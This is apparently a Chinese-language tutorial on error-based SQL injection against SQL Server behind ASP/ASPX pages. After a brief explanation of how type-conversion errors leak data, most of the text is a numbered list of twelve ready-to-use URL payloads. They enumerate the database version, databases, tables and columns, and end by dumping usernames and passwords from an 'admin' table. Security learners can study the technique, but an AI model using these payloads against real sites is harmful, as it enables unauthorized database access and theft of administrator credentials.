我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!!
一、SQLSERVER+ASP 报错注入
1、sql server的报错页面
(1)背景:在语句执行时发生错误会报出错误,并且会在网页上显示出来。
(2)环境:sql server2008+aspx
(4)原理:利用mssql在类型转换失败时的报错
,显示其相应的信息!!!
(3)限制:一次只能爆出一个字段。
2、SQLSERVER+ASP 报错注入示例
(1)爆出数据库版本:?id=1 and @@version>0
(2)爆出数据库:?id=1 and db_name()>0
(3)爆当前用户:?id=1 and User_Name()>0
(4)爆出其他数据库:?id=1 and (SELECT top 1 Name FROM Master..SysDatabases)>0
(5)爆出其他数据库(排除master数据库):?id=1 and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('master'))>0
(6)爆出其他数据库(排除master和iNetinkCMS):?id=1 and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('master','iNethinkCMS'))>0
(7)爆当前数据库的表:?id=1 and (select top 1 name from [mydb].sys.all_objects where type='U' AND is_ms_shipped=0)>0
(8)爆出其他表(排除cmd):?id=1 and (select top 1 name from mydb.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('cmd','test_tmp'))>0
(9)爆出列:?id=1 and (select top 1 COLUMN_NAME from mydb.information_schema.columns where TABLE_NAME='admin')>0
(10)爆出其他列(排除id):?id=1 and (select top 1 COLUMN_NAME from mydb.information_schema.columns where TABLE_NAME='admin' and COLUMN_NAME not in('ID'))>0
(11)爆出数据(username):?id=1 and (select top 1 username from admin)>0
(12)爆出数据(password):?id=1 and (select top 1 password from admin)>0